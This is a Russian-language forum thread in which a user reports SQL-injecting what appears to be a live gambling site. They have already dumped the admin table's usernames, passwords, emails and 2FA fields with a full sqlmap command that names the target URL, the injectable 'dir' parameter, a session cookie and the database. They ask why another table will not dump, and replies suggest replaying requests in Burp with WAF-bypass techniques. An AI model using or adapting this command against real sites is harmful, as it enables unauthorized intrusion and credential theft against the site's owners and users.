Отсутствует information_schema Знаю имена всех таблиц и столбцов Могу выбрать данные с таблицы админ но вот с этой таблицы не могу вывести ничего CREATE TABLE IF NOT EXISTS `site_settings` ( `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, `field` varchar(50) NOT NULL, `value` varchar(255) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `site_settings_unique` (`field`) USING BTREE, KEY `site_settings` (`field`) ) ENGINE=InnoDB AUTO_INCREMENT=138 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; невозможно получить количество столбцов для таблицы sqlmap что делаю не так?
Да вроде нет фильтра sqlmap.py -u "https://allarewin_online/ajax/hiloHistory?v=1&order=number&dir=ASC&limit=15&offset=0" -p "dir" --risk="3" --level="3" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --cookie="bitPTC=eemv8oicf8qsk4if0nv1jb0i0p; bs-theme=light" --dbms=MySQL -D u964478806_allareo -T admin -C username,password,email,2fa --dump --fresh-queries --batch Все выводит без проблем но с другими проблема вывести
-T admin --count +---------+---------+ | Table | Entries | +---------+---------+ | `admin` | 1 | +---------+---------+ -T site_settings --count unable to retrieve the number of entries for any table HTTP error codes detected during run: 500 (Internal Server Error) - 3 times
Без запросов и ответов сайта нет смысла угадывать что там фильтрует. Сохрани запросы в файл и воспроизведи в Burp руками, применяя техники обхода WAF.
в файл не удобно, там же есть параметр verbose ну или через прокси бурпа пустить и в логах видеть все запросы, репитером перепроверять.
Ахахахаха Если только от нехуй делать, плохое настроение поднять, организовать, и киллера из мортала комбата с гоуPr0 какого нибудь прислать к нему, открыть чипсы с попкорн, и сюжету старт.
